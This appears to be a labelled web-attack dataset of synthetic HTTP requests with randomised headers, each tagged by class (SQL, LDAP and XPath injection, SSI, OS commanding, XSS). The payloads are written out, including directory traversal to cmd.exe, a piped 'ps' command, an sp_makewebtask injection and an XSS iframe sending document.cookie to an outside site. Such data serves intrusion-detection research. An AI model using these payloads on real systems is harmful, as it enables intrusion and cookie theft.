Cookie: EvLMMHU=l]sf;;imNriiwhesotdh= -;eao=cpinsertecho4;hYmNnata7oidbg= perl/c;homhYohi3r=aotAeijeseso;9ljb7=:
Cookie2: $Version="16"
Date: Sun, 31 Oct 04 23:38:29 CET
ETag: W/"0@NBRWxhqqgere4xA"
Expect: 100-continue
If-Modified-Since: Tue, 20 Nov 07 01:25:19 CET
If-Unmodified-Since: Sun, 09 Jul 06 21:21:06 CET
If-Match: "m2jQ@9-mcB-xGfvZ"
If-None-Match: "WkeUE2OF866syH9gqE"
If-Range: "sJgoAZjc8z8NEx880"
Max-Forwards: 519
MIME-Version: 0.3
Pragma: oif=xihioe
Proxy-Authorization: Basic dDlhaW46dXFjcA==
Authorization: Basic U2FvdTh0bnQ6dnIyZU5p
Range: -373777
Referer: http://www.cti2lf.it/l3ag/MrDeaQB/eeeo/cyd4aho5.exe
TE: trailers,gzip;q=0.0,deflate
User-Agent: 3Cmwr8V http://www.wentu.biz
UA-CPU: StrongARM
UA-Color: color16
Via: 1.4 206.161.56.112, FTP/6.0 www.eKoeiai.jpeg, hhi0c/4.7 www.ea7Iohs.htm
Transfer-Encoding: compress
Upgrade: ntza0i/5.5
Warning: 100 www.saeeiu.png "ehgteoiulnle" "Tue, 31 May 05 03:38:13 GMT"
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35048
Start - Id: 42480
class: SqlInjection
GET /Rv.pxJAKstdin.pl?o6terLnncw=%27+++OR+%27%27+++%3D++++%27&utnLtdt=rLX8Y1g&6ujohkueesi=itsJ2FTEl&ros=yoxSq%40GNyRmN&oysp=1249&ab5=ugux1eikeeodykEO HTTP/1.0
Host: 234.248.67.50
Connection: keep-alive
Accept: video/*;q=0.3
Accept-Charset: x-mac-icelandic, iso-8859-4, x-mac-hebrew;q=0.3
Accept-Encoding: compress, gzip;q=0.7, identity;q=0.1, compress;q=0.2
Accept-Language: cdew-conntuei
Cache-Control: only-if-cached
Client-ip: 89.45.12.136
Cookie: ehcfue=csrn
Cookie2: $Version="2"
Date: Thu, 20 Oct 05 08:57:44 GMT
ETag: "ucyTNdNZwmzBEzMRFjR"
Expect: slai
From: sheo@RafNi.uk
If-Modified-Since: Wed, 16 Apr 08 23:24:55 UTC
If-Unmodified-Since: Tue, 01 Jul 08 01:07:24 CET
If-Match: "W4LX25hZV.ndrAKyHk"
If-None-Match: *
If-Range: Mon, 20 Nov 06 22:13:32 UTC
Max-Forwards: 6
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: tnrr qtclsQSi=e3eg
Authorization: emmed 32haU8=slot
Range: 7-59040
Referer: /t8re/dqtitetp.swf
TE: deflate;q=0.5,trailers
Trailer: If-Unmodified-Since
User-Agent: tquo7n
UA-CPU: x86
UA-Disp: 1488,9515,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 733x829
Via: HTTP/2.6 www.onoc.tiff, FTP/2.5 11.114.114.134, 4.7 www.rtta.png
Transfer-Encoding: gzip
Upgrade: i9t/0.4, rer/6.1, the/8.5, Dxmt/8.7
Warning: 899 www.i1dtW1t.js:1401 "nerre4v" "Thu, 17 Mar 05 06:33:46 CET"
X-Forwarded-For: 83.163.212.155
X-Serial-Number: 242296099385997
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42480
Start - Id: 40552
class: SSI
GET /m7GMwwAm4NQI3r/CTdocumentdm/oFjtO21xZ/tCkEXIdG8px/sgunw/ljZNylguEV5Yw6uW/uDE10JnfZfRuK/ccn/16sl/n67rsedm3tnn9/chwfnlwen.jpeg?ta1e=%3C%21--++++%23include++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+--%3E&kqni=840634&hetDxAtsd6s8cDa=Eied&htud03slnwag7=45heofanLr&nagnn=764 HTTP/1.1
Host: www.0hlt.ch
Connection: close
Accept: */*;q=0.8
Accept-Encoding: 
Accept-Language: u0-eefdEn
If-Modified-Since: Tue, 19 Jul 05 04:36:06 CET
Max-Forwards: 8
Referer: /erat.fgf
User-Agent: Mozilla/5.5 (Windows; U; WinNT 9.3; nn-cL; rv:4.6.7) Gecko/34323414
X-Forwarded-For: 173.188.123.52
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40552
Start - Id: 43542
class: OsCommanding
GET /_XSpfMUatelnete9/aDoWptesvJeVr5vW.jpeg?srxtAbor0t=p0DCK&IqZCf=access_logys2%3Axioi9&QiyDn6K.H7=34913&saosoteProrr=0z9&dNdd3ethftfse=%7C+++ps+++-auxwww+%3B&mRsmaktu=892475&xeeafao2dn=%29h&9SH9Ft=Olstdga%25dtp%3Fddvia&hua5ggl87ceroee=ve&Elr7ymoesgd=epte4EngeCr HTTP/1.0
Host: 103.47.251.241
Connection: close
Accept: text/*;q=0.5, image/jpeg;q=0.2
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: tde3wgs-is3LH;q=0.9, hs7-9A;q=0.8, neiWa5-r
Cache-Control: min-fresh=3
Client-ip: 214.70.1.175
Cookie: ahptThstiolq=ldsy.mD
Cookie2: $Version="046"
Date: Fri, 28 Jan 05 21:20:26 UTC
ETag: W/"LAnz5Rj1v.GFfze"
Expect: hhdoic
From: dmmdhau@nI4vEb.com
If-Modified-Since: Mon, 11 Feb 08 09:41:16 UTC
If-Unmodified-Since: Sat, 23 Oct 04 05:48:14 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 13 Dec 07 06:52:24 CET
Max-Forwards: 90
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: Basic c2NndDpFRWhiaHQ0
Authorization: mpesu esblT=tety
Range: 387259-2,9-
Referer: /fSpj/E3hoam1.php4
TE: deflate,trailers
Trailer: Expect
User-Agent: iseh7xshgoegstytutnh
UA-CPU: x86
UA-Disp: 230,276,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 5688x504
Via: 7.8 www.farin.jpeg, 4.1 www.t0dlt.css
Transfer-Encoding: compress
Upgrade: tatTmi/7.0
Warning: 755 www.rpcofa7.png "taotesry9p" 
X-Forwarded-For: 166.207.32.118
X-Serial-Number: 00610632074
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43542
Start - Id: 38385
class: LdapInjection
GET /ntKzRfNrZ9@nlFZNZx/nRvaEaE/71HgLnUBKlJmNc/r6eolipkqrorf/uO3zled/w7wob/lQlinkXrtF8psF/sl7bMeBs/hlSlzic9atpbbdmeIrt/2d/oo_qSbs0t9Qjmbis/tdE8rntahgcios.png?UNh=khooe%2B4deqSd4e&V7r8OCB9J2=99207&wzaitcpSi=85&emcesset=%29+++%28+++%7C++++%28+cn%3D*o+++%27brien*+%29%28mail+++%3D*o++%27brien*++++%29+++&eedx@A3Fo=427494622 HTTP/1.0
Host: www.8earen.com
Connection: shNsol
Accept: text/html;q=0.6
Accept-Charset: *
Accept-Encoding: gzip, compress;q=0.2, gzip;q=0.7, compress, compress;q=0.2
Accept-Language: lsMzthdi-nqnsat1, htHyt-rre8;q=0.0, f-ey;q=0.6
Cache-Control: no-cache
Client-ip: 64.84.236.66
Cookie: passwd9KPT=iiT;TnddoxhcciiqDs==Th+ih;nh9o=9283;eyadasjjethanho= %ufo7rrFrmeerrxp_t;litedptnozgPesi=nAxy43.R
Cookie2: $Version="09"
Date: Wed, 12 Sep 07 21:59:34 UTC
ETag: W/"yNFl3unHM9j-nY_lvkD"
Expect: uFhie
From: e3ig@cUsnasr.com
If-Modified-Since: Fri, 02 Feb 07 24:28:00 GMT
If-Unmodified-Since: Sat, 08 Jul 06 05:35:59 CET
If-Match: "Gk7arPnYhjnnwlU1FqI8"
If-None-Match: *
If-Range: Thu, 14 Jan 10 16:11:26 UTC
Max-Forwards: 94
MIME-Version: 7.6
Pragma: siad='Ea'
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: 6tlnns eeqe0aFp=reTdotc
Range: 5-3896,18685-499682,-36
Referer: http://www.ie3tnss9.ch/hc2ne/rc2o/te54sonn/iambsany.mdb
TE: gzip;q=0.1
Trailer: Accept-Encoding
User-Agent: Mozilla/5.9 (X11; U; Unix 3.7; 3o-tu; rv:3.6.0) Gecko/53676777
UA-CPU: 68000
UA-Disp: 6597,6108,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 6780x4829
Via: ocess5/0.8 181.220.211.32, g3ewgb/3.0 www.wed6y.js
Transfer-Encoding: deflate
Upgrade: ottf/8.1, nEtN/4.3, m1n4n/1.7, fN2/3.2, attfJ/3.6
Warning: 306 www.u4zhxszn.shtml "rahmw" 
X-Forwarded-For: 120.14.244.116
X-Serial-Number: 85165873223938
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38385
Start - Id: 35641
class: XPathInjection
GET /3cnrihcpeeBRSdmdiea/Avar2y7LdocumentRlinkx5cE_/U1mBUzUSrKfIvI/K_SjGWw8faA/naenBdoO/ecrzQt/1nYy6Y-Hv.InRA.php3?sf_copyeVkcmd8pCN=e&Eotd=8tlnift&FhKxWVODozGU=r1MuwVV5&esemnonedet7ean=w%5D1T6th7ohlinks%26%29ls%5B&yiqBRiw03a=8&jIOvumd=sesRt%3Dthmnnssyitrj9&r4noorueNp=9++++or+++Etlwe%2Fttel%2Fthtor%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D4%5D+++++or+++797%3D&VYur7ir3o.yK=wo HTTP/1.1
Host: 59.58.136.136
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.0
Accept-Language: E1eoi-setdir;q=0.4, a53ntt-trabs1h, pmtCt-e, amsj-ao0qq;q=0.7, i0-sa
Cache-Control: bmrdbrp=miike
Client-ip: 69.177.219.175
Cookie: T1NjWqdBIL=tOanltxfiroLd1seo
Cookie2: $Version="5"
Date: Sat, 06 Mar 04 23:10:45 GMT
ETag: W/"5joi@sl1CHdkS19bN3"
Expect: 100-continue
From: esirPUo@ltaa.cz
If-Modified-Since: Mon, 12 Sep 05 21:13:01 CET
If-Unmodified-Since: Wed, 24 Dec 08 02:45:14 CET
If-Match: "1_h@9ovB5ysCSxcKeE"
If-None-Match: "jyXh9uV8U_znHt9idY"
If-Range: "ZGfN_o8g6C7qkTyFq_r"
Max-Forwards: 2143
MIME-Version: 1.3
Pragma: h='onEeEth'
Proxy-Authorization: Digest opaque="snOLwi"
Authorization: NTLM RG9kY0lPanM3aGlpd1M2dGFvZ2kxaDRrbm0wdGVyY3Noc3Bobm56YmQ=
Range: -38,162-85,-031
Referer: /1ieda/hdtocfr/vwcs5/ARruma.pdf
TE: gzip,gzip,gzip;q=0.3
Trailer: Range
User-Agent: xousteah0ayJ
UA-CPU: StrongARM
UA-Disp: 458,730,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 3327x2128
Via: tete3/5.1 81.40.254.3, 3.0 217.130.122.170:6687
Transfer-Encoding: identity
Upgrade: e1e/4.3, eSaj/4.1, rweui/7.2
Warning: 083 51.53.107.61:3990 "ittpbttTz" "Fri, 23 May 08 24:15:13 GMT"
X-Forwarded-For: 246.53.246.66
X-Serial-Number: 587545
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35641
Start - Id: 36688
class: OsCommanding
GET /sICQcqz_QHPqD/en/sBPNeC/pLBo7fNmK-GdsafU/ylaxseas.shtml?_B0JEl=seabasbEs&2scacfiI1srfedE=hrelnresl&elgma8seen=49&dkPerTobN=mailercmdat+%7Cine&DNform4Oh=1333&sAstieMthe=127361&neNewehcn1ed=24ooe5object%3A%3C+cOa&uus2sjen=lloatwn&d9s9n9m72ea=1rgstDn9tht&yntE2s8=lgi%7Ermipc0ntr%27&reWeo=hneDU&eeeq=mkwyu&ag4esLshttceiuq=775922 HTTP/1.0
Host: www.Ywkttrfwt.ch
Connection: cghpWnth
Accept: video/mpeg, video/mpeg;q=0.9, image/png
Accept-Charset: x-mac-turkish, isiri-3342;q=0.4, shift_jis
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Cookie: dkccsrbwrenese=sntrrtWlc;htoeo=|     ps   -auxwww;;bmqumh=yliveb]
Date: Sun, 08 Jan 06 18:58:56 UTC
If-Modified-Since: Fri, 03 Apr 09 23:35:11 UTC
If-Unmodified-Since: Fri, 02 Apr 04 13:19:36 UTC
If-Match: "-zCloXuRtERDwPvB60vF"
Range: -7095,53676-3575,2728-6
Referer: http://j8oo.biz/6a0e/meT4isT/uot8u9as/Pwdel/ttwo.php4
User-Agent: Uflxk (zLcx8C@; iTybhzyWt; g8IIWNYVSh)
UA-Color: color32
----: -----------------------

null

End - Id: 36688
Start - Id: 44145
class: OsCommanding
GET /cgi-bin/../../../../../../../WINNT/system32/ping.exe 127.0.0.1? HTTP/1.0
Host: www.Toeipnc.fr
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-korean;q=0.4, us-ascii;q=0.1, x-mac-arabic;q=0.9, koi8
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 39.47.60.88
Cookie: yaJouAiyuekie=addaa;lIOnsr=11155185;iolplrbsyfnnhe=29785256
Cookie2: $Version="3"
Date: Mon, 21 Aug 06 04:51:38 GMT
ETag: W/"j11dUi1m7aDRxn7yYAcp"
Expect: 100-continue
From: qrumvR@uodIyinab6.uk
If-Modified-Since: Sat, 30 May 09 18:59:20 CET
If-Unmodified-Since: Fri, 30 Apr 04 18:50:21 GMT
If-Match: "D.@porpLCF@3E-TB4"
If-None-Match: *
If-Range: "DX5982-v6mPIKEx"
Max-Forwards: 964
MIME-Version: 4.2
Pragma: 9jlrss=y
Proxy-Authorization: Digest realm
Authorization: u4vnW ekaave=i9sui
Range: 815-,644-20793
Referer: /p038fwi/Orcnd/eiHab7/HQees.php4
TE: gzip,deflate;q=0.7,trailers
Trailer: Date
User-Agent: Mozilla/4.6 (Windows; U; Windows NT 8.6; rG-nm; rv:2.5.8) Gecko/88931686
UA-CPU: PowerPC
UA-Disp: 010,645,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 1501x189
Via: 3.3 74.6.233.37, FTP/4.3 205.130.142.7, tn3/0.6 www.re0pe.jpeg
Transfer-Encoding: identity
Upgrade: elepej/6.1, assl/9.6, tHws/5.5
Warning: 461 www.cMmiov.shtml "nih5iohnfhs8ylysduaa" "Thu, 12 Feb 09 12:33:00 CET"
X-Forwarded-For: 175.18.32.237
X-Serial-Number: 008751
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44145
Start - Id: 43966
class: OsCommanding
GET ..��...��..��..��..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.2geMt0reti.gov:80
Connection: close
Accept: image/png, application/rtf
Accept-Charset: *
Accept-Encoding: *
Accept-Language: 4eusrso-an35o
Cache-Control: max-age=69
Client-ip: 112.139.123.3
Cookie: eArsu=407;TA@rE=Sayeghniro8ge
Cookie2: $Version="45"
Date: Wed, 27 Oct 04 21:44:46 UTC
ETag: "d0_qiYUs1JJWIAlbJB6"
Expect: naaaaho=iektd;i12sv
From: axenii@lMdner.de
If-Modified-Since: Sat, 20 May 06 19:30:11 CET
If-Unmodified-Since: Fri, 20 Feb 04 04:23:12 UTC
If-Match: "-p2rLxjVRyesjAFX.Q"
If-None-Match: *
If-Range: Thu, 03 Jun 04 18:22:20 CET
Max-Forwards: 0
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: NTLM bmxnaGZjaGlvaHRyYm50MDZicmlncFptY3FUc25pbXp0c3J2YmhodHk=
Authorization: NTLM VHVNYWVyN3Rzbml0d2lzcnBybGFqZXZsdm8wbGdkaWM=
Range: 2873-08
Referer: /lze7rw.jpeg
TE: chunked,trailers
Trailer: Referer
User-Agent: Mozilla/6.8 (X11; U; Linux i386 1.6; hs-yi; rv:7.1.3) Gecko/35069523
UA-CPU: 68000
UA-Disp: 7638,7203,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 2346x026
Via: 7.9 35.81.119.170
Transfer-Encoding: diar
Upgrade: pAn/5.4, eynSnm/6.6
Warning: 185 www.ayfae.tiff:7 "h2dyo3oifn2sa9H7" 
X-Forwarded-For: 67.28.144.149
X-Serial-Number: 221610848523557
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 43966
Start - Id: 38380
class: LdapInjection
GET /sewSa/eG9Q5R9q.vFrXhDhKP/twre0ama/csngt1azjeTsRp/onntoeoslvtAzlnnwt7d/WlcQG/sAewt/3zC1N_b.shtml?bs0=qp89&tnnhrum9i=y6m%29%28+++%7C+++%28tiab%3D*%29 HTTP/1.1
Host: 125.240.7.26
Connection: close
Accept: audio/x-wav;q=0.5
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 16.162.112.106
Cookie: trlktnhrus=enraeBr;topNn=ef;E6tu88=?m:1t\
Cookie2: $Version="442"
Date: Mon, 26 Apr 10 04:42:51 GMT
ETag: "QwQZukIzWDZGSVE"
Expect: gatu
From: e3ig@cUsnasr.com
If-Modified-Since: Tue, 18 Sep 07 03:33:15 CET
If-Unmodified-Since: Wed, 30 May 07 24:53:44 UTC
If-Match: "x3Veeu-2SRCXR1YS"
If-None-Match: "hmxWYR3F.Yd2@Y5J"
If-Range: *
Max-Forwards: 7438
MIME-Version: 7.6
Pragma: MevR=7
Proxy-Authorization: Digest algorithm=MD5
Authorization: Basic c2dsb2VzOmx0c2NCNHM=
Range: 076462-,762888-7,-42981
Referer: /pgtnu/bdevr7u.wav
TE: gzip;q=0.1,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/1.8 (Machintosh; U; PPC Mac OS X 1.0; o5-rn; rv:2.8.0) Gecko/98862923
UA-CPU: 68000
UA-Disp: 6597,6108,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 6780x4829
Via: FTP/8.5 197.172.2.130
Transfer-Encoding: deflate
Upgrade: rysE/9.0, mt3/0.2, 84ag/2.9
Warning: 306 www.u4zhxszn.shtml "rahmw" 
X-Forwarded-For: 18.81.134.210
X-Serial-Number: 85165873223938
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38380
Start - Id: 44216
class: OsCommanding
GET %u002e%u002e%u002f%u002e%u002e%u002fwinnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 234.68.217.115:8679
Connection: ee2f
Accept: */*;q=0.2
Accept-Charset: us-ascii;q=0.9, iso-8859-7, x-mac-chinesetrad;q=0.7
Accept-Encoding: *;q=0.8
Accept-Language: aghsogh-flIteoa;q=0.5, aEte-emN, tpa-rseeeOr;q=0.1
Cache-Control: no-store
Client-ip: 99.103.6.37
Cookie: coit4elcsbneac=228;c0uwe2e=5596737
Cookie2: $Version="370"
Date: Thu, 13 Oct 05 04:07:04 UTC
ETag: W/"4YYbH-nJZmZTHi0FC"
Expect: et2ess1=aa0davZ;sinntl
From: rOaz@gEadsxsee.biz
If-Modified-Since: Wed, 10 May 06 16:35:04 UTC
If-Unmodified-Since: Tue, 27 Apr 04 11:13:00 UTC
If-Match: *
If-None-Match: *
If-Range: "1TVFAbk1gVPvL1D"
Max-Forwards: 6119
MIME-Version: 1.8
Pragma: zadee='l'
Proxy-Authorization: Basic aXROTzN0OmZlaWM=
Authorization: Digest qop=i8kedAln
Range: 09660-850419
Referer: http://nei3so.be/l1oyfbi/rndabi/jmes/idtR/trr3npn.pl
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: b6mnahg/2.4
UA-CPU: PowerPC
UA-Disp: 220,5543,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 352x848
Via: 8.1 198.77.239.197
Transfer-Encoding: gzip
Upgrade: eeiw/8.3, Tc4cy/9.9, ciigE/9.1
Warning: 268 161.222.182.214 "sxsom" 
X-Forwarded-For: 65.185.122.174
X-Serial-Number: 77570647240448229537
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44216
Start - Id: 46928
class: XSS
POST /Ae1Qdocuments/misa/hWywoYOSrqX0Zob/iget2muhenaita4hZotc/qEZXFtgyeDQNiybe/3bnjeBvV_XUnn-0cl/HlHH5nxDINYH/dlink9zci1J-phpSsBJ/iyZJf_a6Cvhcakz5dmv/f0.cfm? HTTP/1.0
Content-Length: 414
Content-Language: aev4io,4rgb4p
Content-Encoding: identity
Content-Location: http://www.lF2l.cz/ebdegni/2eknhr.txt
Content-MD5: ck1lZTdwT2xlbWFhbnFoSw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 28 Jun 04 09:50:06 GMT
Last-Modified: Wed, 29 Nov 06 08:09:43 GMT
Host: www.gssw.uk
Connection: keep-alive
Accept: audio/basic;q=0.6, image/jpeg;q=0.4, image/gif
Accept-Charset: x-mac-korean;q=0.0, iso-8859-4;q=0.3, x-mac-arabic, iso-8859-5, windows-1254;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: e='n'
Client-ip: 233.117.50.11
Cookie: ixsoi=ite;toheaueei=4ER;taUIqseare3NV=w4D3C2Pl4X;KN5-1xp_q6Q5r=B5iqa
Cookie2: $Version="688"
Date: Tue, 13 Jul 04 15:31:49 CET
ETag: W/"ZePz2OHFeYlBvufA5PPg"
Expect: 100-continue
From: iadhhX@vmafir.de
If-Modified-Since: Wed, 03 Mar 04 23:49:43 UTC
If-Unmodified-Since: Sun, 04 Jul 04 13:46:43 CET
If-Match: "9NvXorM87VYW9eRQD"
If-None-Match: *
If-Range: Sun, 29 Jun 08 16:27:56 CET
Max-Forwards: 86
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: Digest response="eFbfA56cDAdebE9DbbcbBaEe47d454df"
Authorization: Basic ZG1lY21jOm5pbHE=
Range: 531-1875,-8
Referer: /mtgaWoDk/efat/tnwl/emcazio/enoOes.txt
TE: deflate,chunked
Trailer: Accept-Encoding
User-Agent: osxhoaatd/5.1
UA-CPU: MIPS
UA-Disp: 4346,951,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 642x9764
Via: 3.6 www.Ehaersum.gif, 1.9 www.tltenyls.shtml
Transfer-Encoding: gzip
Upgrade: sdW/7.9, agrd/5.9, wt6wa9/7.2
Warning: 179 www.uasae.gif "peEehwtea6n8inr" 
X-Forwarded-For: 207.203.23.208
X-Serial-Number: 3374825125599046
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

nXSM=s%&e0dwn=lkWDgZoiz2S&aytizeGesjmbmn=oandfromp&otbozrat4orvef=uiagitWt3qt&m0KBY1V7=cfrcp0ae&esrortswdu=6Eua2b6e&access_logbinkTn50m=<iframe  src=   "vbscript:[document.location.replace    ('http://www.st.com/cgi-bin/nein.cgi'+document.cookie);]   "    >&ysoudse6ie=2sbcenzesutMtoofi6&6KYcZC.wDvbscriptS=craXAOG&Hlineye=$h&rl6grranso1zx=s3$etttto$&ilf2eeie=46376147

End - Id: 46928
Start - Id: 35903
class: XPathInjection
PUT /oo9/m9cfqsizIe/ftnWta/en_/od27-xvtOJ/ttrsjaJite/ef7RVi7jCfL/eTdivUGx/ytzotTdxrodd/NY/dyooeehs/OinboIn.htm? HTTP/1.1
Content-Length: 52
Content-Language: eyee,t
Content-Encoding: compress
Content-Location: http://www.dih1.fr/xteoP.jpeg
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 09 Jan 09 18:11:04 UTC
Host: www.8dnosyi.de
Connection: close
Accept: image/*
Accept-Charset: iso-8859-8-i, isiri-3342, x-mac-chinesesimp
Accept-Encoding: *
Cache-Control: max-age=02
Cookie: elh4eatI9jjIrn=ited;nhD=a_E;mBCvYxtermGXB72=847  or  1< i/b/ana/child::text()[position()=4]     or    5017='] | /* | /foo[bar=';Eueoce6lmL=eL1D
ETag: "fvbKsGMT69H9Z3D"
If-Modified-Since: Tue, 15 Nov 05 05:29:18 UTC
Proxy-Authorization: Basic TmxyZXJyb1I6aWxvaWxj
Referer: http://ptaz.st/otchqwhn.asmx
TE: trailers,chunked,chunked
User-Agent: o0oHnePccnpgeHtrhd
Via: 2.3 www.aAelpeo.htm, 7.0 www.eoStj.js:65796

n1mFicopy7r=vrCso&cspBt=hrop2le&inoiaole6oo=t49IrK5q

End - Id: 35903
Start - Id: 37609
class: LdapInjection
PUT /ysheonoevoOtd6sHeA/window.openAnph-/51@dropQlkM_Rx9/lTDwIE/eirwestzotle/Vnh1/rhiolvfgeaeIht/5M2a/arosrseIeghl/owJOtDbjfEjVt3/piP.szL-w/gt_lJFM251kz.css? HTTP/1.0
Content-Length: 52
Content-Language: lDA,ds2ei,n7m
Content-Encoding: compress
Content-Location: /ainrleh/rslSoos/eakN.fgf
Content-MD5: bnE2ZXNubm40ZXRhZ2tucg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 29 Nov 08 10:01:45 CET
Last-Modified: Wed, 08 Mar 06 06:21:26 GMT
Host: 136.57.221.254:49
Connection: close
Accept: application/*
Accept-Charset: x-mac-roman;q=0.6, iso-2022-kr, x-mac-icelandic;q=0.1
Accept-Encoding: deflate, deflate;q=0.4
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 34.23.57.157
Cookie: ze9BlocationZ=732496;9etha9stahwo9=eandhpg;.ByWM_eEdelete=Sde;iamJsi8ePtC7N=libde]ei ohssg/p\e
Cookie2: $Version="98"
Date: Sun, 07 Jun 09 09:21:57 GMT
ETag: "@QX@_ywUL101QKMd"
Expect: tadtati=ehee;deeu=eDczsw
From: tiwatv@kDh9.de
If-Modified-Since: Fri, 20 Oct 06 23:52:02 CET
If-Unmodified-Since: Sat, 17 Jun 06 06:52:12 CET
If-Match: "EgyXQ@o0ERvqenLlYv7N"
If-None-Match: *
If-Range: "wvA@JUrv35pnlKNxVZrv"
Max-Forwards: 5
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: wCwbd1 E1saai=4olnf
Authorization: NTLM U2lidUV0ZW52c2tlc2hpcGlwZG5uYW51OXNvbE9sdWNlaTFkenNoZDhqdGVpSQ==
Range: 5-,297-087
Referer: /metel/orqx.bin
TE: trailers
Trailer: Accept-Language
User-Agent: aNZErX-mV http://www.iduwte.org
UA-CPU: PowerPC
UA-Disp: 2548,1743,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 770x317
Via: HTTP/0.8 119.213.14.150, 1.5 www.eodt.html:0569
Transfer-Encoding: deflate
Upgrade: roOt/4.0, lDulw/0.4, tsto/6.6, teepwe/5.4, uyq/3.7
Warning: 884 75.45.43.166 "cemm8l" "Sun, 10 Jul 05 20:22:37 CET"
X-Forwarded-For: 20.191.23.124
X-Serial-Number: 220877773
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

Disbsig8=e0d&tpiEntry=)( |   (Sea=njrl*)

End - Id: 37609
Start - Id: 36393
class: OsCommanding
GET /.f1bD172W/TMnph-f4OcMxyR/2tiirmnlaini/LilOX342/K1HU/e@3A/lLgvmVzCbQ3x8x7j.html?liPz=8993&us=%7CVhreei2%28&rdimtnQt=s&mt=n4EABgS&swnpof72namtu=a%29r HTTP/1.0
Host: www.fauemo.com
Connection: tib2s
Accept: */*;q=0.1
Accept-Charset: x-mac-hebrew, cp-936;q=0.1
Accept-Encoding: *;q=0.2
Accept-Language: rrsaa-e7das;q=0.8, Eetki-xonl;q=0.3, n-hsiiElt;q=0.8
Client-ip: 33.4.194.239
Cookie: 4dcvg=9777032;gchtnlNxawbQOa=';     EXEC master.dbo.sp_makewebtask     'c:\inetpub\wwwroot\2uen.shtml',     'SELECT i5ssnrcA FROM     hontfho     WHERE  xtype=''U''';yEOoi6winntP=afnlxdidvw
If-Match: *
If-None-Match: *
Max-Forwards: 678
Proxy-Authorization: Digest algorithm=MD5-sess
Referer: http://www.ips8.be/xjO7eo/yarmadt.asp
User-Agent: s9c7fvfGGc http://www.rSuRhAo.de
----: ---------------

null

End - Id: 36393
Start - Id: 49048
class: XPathInjection
GET /d8t21/lxyyA/teY9A/p0fikmTEmetldDnreey/ug79ErgkV2O8k/r6B9nIJCZ7DfKg/rtaZ.jpg?lo2e=aexscriptyfi&JCevalmMOxQGK=33305&e5=576&ot=262017&eatngeeOp5wla=domOwu%2Fxm%2FnWult%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D95%5D+or+++%274da%27++%3D++%27&rsh=69448902 HTTP/1.0
Host: www.ciretlt1g.com
Connection: ep9seHn
Accept: */*
Accept-Charset: euc-jp;q=0.5
Accept-Encoding: 
Accept-Language: tTdn-eiiopl, enuirv-aTeu6c;q=0.1, nesetma-maare;q=0.7, dne-eWao4m
Cache-Control: max-age=282
Client-ip: 23.215.109.9
Cookie: aO21QQwqAy=ht n ;ttcehbtkt2GrhAd=18sn8atTeoKydoode;vjhLmhsgods=0350421;w7X@7documentCZsock_streamsHP=raleth9sIebbi;ehanySaidoA=llxoqtnwemeettsf;lRnie=e_xXXWNMOGej
Cookie2: $Version="8"
Date: Fri, 14 Apr 06 18:57:41 GMT
ETag: W/"2YlmfSvacm4dk0cN"
Expect: 100-continue
From: urjcf@ison8Wi.org
If-Modified-Since: Wed, 24 Sep 08 13:36:31 UTC
If-Unmodified-Since: Tue, 20 Nov 07 05:11:45 GMT
If-Match: "FJo9EIPN3CUeNVRZ7"
If-None-Match: "8NE.z4vMB3hp6z-0AY"
